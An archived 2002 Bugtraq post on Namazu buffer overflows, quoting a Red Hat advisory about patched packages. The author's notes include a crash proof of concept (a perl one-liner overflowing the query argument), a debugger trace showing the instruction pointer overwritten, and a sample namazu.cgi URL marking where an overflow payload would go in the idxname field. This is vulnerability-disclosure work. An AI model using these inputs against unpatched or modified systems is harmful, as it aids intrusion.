[23791] in bugtraq
Details on the updated namazu packages that are available
daemon@ATHENA.MIT.EDU (KF)
Thu Jan 10 13:59:30 2002
Message-ID: <3C3CCEFE.6080501@snosoft.com>
Date: Wed, 09 Jan 2002 18:15:10 -0500
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
Cc: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Doh! Looks like I slept on this one too long... here's some of my
personal notes on exploiting this issue. Have fun.
-KF
[root@linuxppc root]# cat misc/namzu-overflow.txt
http://www.altavista.com/sites/search/web?q=url%3Anamazu.cgi&kl=XX
This is what caught my attention
[msg(XXX)] like 12 days old
[msg(XXX)] 2001-12-12 NOKUBI Takatsugu <knok@daionet.gr.jp>
[msg(XXX)] (nmz_choose_msgfile_suffix): Fixed buffer overflow.
[msg(XXX)]
http://cvs.namazu.org/~checkout~/namazu/ChangeLog?rev=1.912&content-type=text/plain
2001-12-11 NOKUBI Takatsugu <knok@daionet.gr.jp>
* nmz/field.c: Fixed possibility of buffer overflow.
2001-12-04 NOKUBI Takatsugu <knok@daionet.gr.jp>
* src/{form.c,rcfile.c,result.c}: Fixed possibility of buffer overflow.
* src/cgi.c (validate_idxname): Fixed another cross-site scripting
vulnerability.
(cgi_get_vars): Fixed possibility of buffer overflow.
2001-07-03 Yoshinori TAKESAKO <takesako@namazu.org>
* src/result.c (my_strcasestr): Checked a buffer overflow,
the case where a character sequence was over at the 1st byte
of EUC-JP.
Here is my research on the above issues:
There are several buffer overflows in the QUERY_STRING options.
Unfortunately, the check in namazu.h screws us...
[root@linuxppc src]# grep CGI_QUERY_MAX *.h
namazu.h: CGI_QUERY_MAX = 512, /* Max length of a CGI query */
cgi.c: if (contlen > CGI_QUERY_MAX) {
cgi.c: printf(_("Too long QUERY_STRING"));
In other words, unless you have modified namazu, you are not vuln.
Now we can exploit this via the command line as a side note ... although
it's not suid...
[root@linuxppc src]# ./namazu querystring `perl -e 'print "A" x 1024'`
Results:
References: [ (can't open the index) ]
No document matching your query.
Aborted (core dumped)
The eip is easily overwritten. Here only the first 2 bytes...
Starting program: /root/namazu-2.0.5/src/../src/.libs/lt-namazu yamom `perl -e 'print "A" x 1342'`
Program received signal SIGILL, Illegal instruction.
0x41412f4c in ?? ()
So just for theory's sake, and cuz I want to code something...
we will say that we are using a custom namazu in which we modified the
following values in namazu.h.
CGI_QUERY_MAX = 512, /* Max length of a CGI query */
CGI_INDEX_NAME_MAX = 64, /* Max length of an index name in a CGI query */
Then we could be exploited.
cgi-bin/namazu.cgi?query=overflow&whence=0=en&idxname=<bof here> would be a quick example.
-KF
bugzilla@redhat.com wrote:
> ---------------------------------------------------------------------
> Red Hat, Inc. Red Hat Security Advisory
>
> Synopsis: Updated namazu packages are available
> Advisory ID: RHSA-2001:179-05
> Issue date: 2001-12-27
> Updated on: 2002-01-09
> Product: Red Hat Linux
> Keywords: namazu cross-site scripting buffer overflow
> Cross references:
> Obsoletes: RHSA-2001:162
> ---------------------------------------------------------------------
>
> 1. Topic:
>
> Updated namazu packages are available for Red Hat Linux 7.0J. These
> packages fix cross-site scripting vulnerabilities. They also fix a possible
> buffer overflow.
>
> 2. Relevant releases/architectures:
>
> Red Hat Linux 7.0J - i386
>
> 3. Problem description:
>
> Namazu is a full-text search engine. Namazu 2.0.9 and earlier may
> inadvertently include malicious HTML tags or scripts in a dynamically
> generated page, based on unvalidated input from untrustworthy sources.
> Also, a buffer overflow vulnerability exists in the buffer size of an
> environment variable.
>
> These packages update Namazu to version 2.0.10 which is not vulnerable to
> these issues.
>
> 4. Solution:
>
> Before applying this update, make sure all previously released errata
> relevant to your system have been applied.
>
> To update all RPMs for your particular architecture, run:
>
> rpm -Fvh [filenames]
>
> where [filenames] is a list of the RPMs you wish to upgrade. Only those
> RPMs which are currently installed will be updated. Those RPMs which are
> not installed but included in the list will not be updated. Note that you
> can also use wildcards (*.rpm) if your current directory *only* contains the
> desired RPMs.
>
> Please note that this update is also available via Red Hat Network. Many
> people find this an easier way to apply updates. To use Red Hat Network,
> launch the Red Hat Update Agent with the following command:
>
> up2date
>
> This will start an interactive process that will result in the appropriate
> RPMs being upgraded on your system.
>
> 5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):
>
>
>
> 6. RPMs required:
>
> Red Hat Linux 7.0J:
>
> SRPMS:
> ftp://updates.redhat.com/7.0/ja/os/SRPMS/namazu-2.0.10-0j1.src.rpm
>
> i386:
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-2.0.10-0j1.i386.rpm
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-devel-2.0.10-0j1.i386.rpm
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-cgi-2.0.10-0j1.i386.rpm
>
>
>
> 7. Verification:
>
> MD5 sum Package Name
> --------------------------------------------------------------------------
> 521c9faef31dcd865d3e0090cd023d70 7.0/ja/os/SRPMS/namazu-2.0.10-0j1.src.rpm
> ae5d586caf2098a0b9aefcc7af6522a9 7.0/ja/os/i386/namazu-2.0.10-0j1.i386.rpm
> 904dc3993c140794373471e8a1c64c61 7.0/ja/os/i386/namazu-cgi-2.0.10-0j1.i386.rpm
> af30f16968c527ac9e7669c812618cde 7.0/ja/os/i386/namazu-devel-2.0.10-0j1.i386.rpm
>
>
> These packages are GPG signed by Red Hat, Inc. for security. Our key
> is available at:
> http://www.redhat.com/about/contact/pgpkey.html
>
> You can verify each package with the following command:
> rpm --checksig <filename>
>
> If you only wish to verify that each package has not been corrupted or
> tampered with, examine only the md5sum with the following command:
> rpm --checksig --nogpg <filename>
>
> 8. References:
>
> http://www.namazu.org/#news
>
>
> Copyright(c) 2000, 2001, 2002 Red Hat, Inc.
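As an added, defender-side illustration of the length guard KF's post turns on (the `contlen > CGI_QUERY_MAX` check in cgi.c that keeps a stock namazu.cgi out of reach, plus the separate CGI_INDEX_NAME_MAX limit on idxname), here is a small C sketch; it is not namazu's code, the two limits are copied from the post, and the function names, status codes and sample query are assumed.

```c
#include <string.h>

/* Limits as quoted from namazu.h in the post above. */
enum {
    CGI_QUERY_MAX      = 512, /* Max length of a CGI query */
    CGI_INDEX_NAME_MAX = 64   /* Max length of an index name in a CGI query */
};
/* Status codes of this hypothetical reader (not namazu's own API). */
enum cgi_status { CGI_OK = 0, CGI_TOO_LONG, CGI_VALUE_TOO_LONG, CGI_NOT_FOUND };

/* Outer guard from the post: copy QUERY_STRING into a fixed buffer only if it
 * is no longer than CGI_QUERY_MAX. With this check a 1024-byte query never
 * reaches the fixed-size buffers downstream; raise the limit and it does. */
enum cgi_status read_query(const char *raw, char *out, size_t outsz)
{
    size_t contlen;
    if (raw == NULL)
        return CGI_NOT_FOUND;
    contlen = strlen(raw);
    if (contlen > (size_t)CGI_QUERY_MAX)
        return CGI_TOO_LONG;      /* namazu prints "Too long QUERY_STRING" here */
    if (contlen + 1 > outsz)
        return CGI_TOO_LONG;      /* do not trust the caller's buffer either */
    memcpy(out, raw, contlen + 1);
    return CGI_OK;
}
/* Fetch one name=value pair, enforcing a per-variable limit (e.g.
 * CGI_INDEX_NAME_MAX) before any byte is copied: a value that fits the
 * whole-query limit can still be far too long for its own buffer. */
enum cgi_status get_var(const char *query, const char *name, char *out, size_t maxlen)
{
    size_t nlen = strlen(name);
    const char *p = query;
    while (p != NULL && *p != '\0') {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            const char *end = strchr(v, '&');
            size_t vlen = end ? (size_t)(end - v) : strlen(v);
            if (vlen > maxlen)
                return CGI_VALUE_TOO_LONG;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return CGI_OK;
        }
        p = strchr(p, '&');
        if (p != NULL) p++;       /* step past the separator */
    }
    return CGI_NOT_FOUND;
}
```

The second check is the one that matters once CGI_QUERY_MAX has been raised: a query that passes the outer limit can still carry an idxname far longer than its 64-byte buffer.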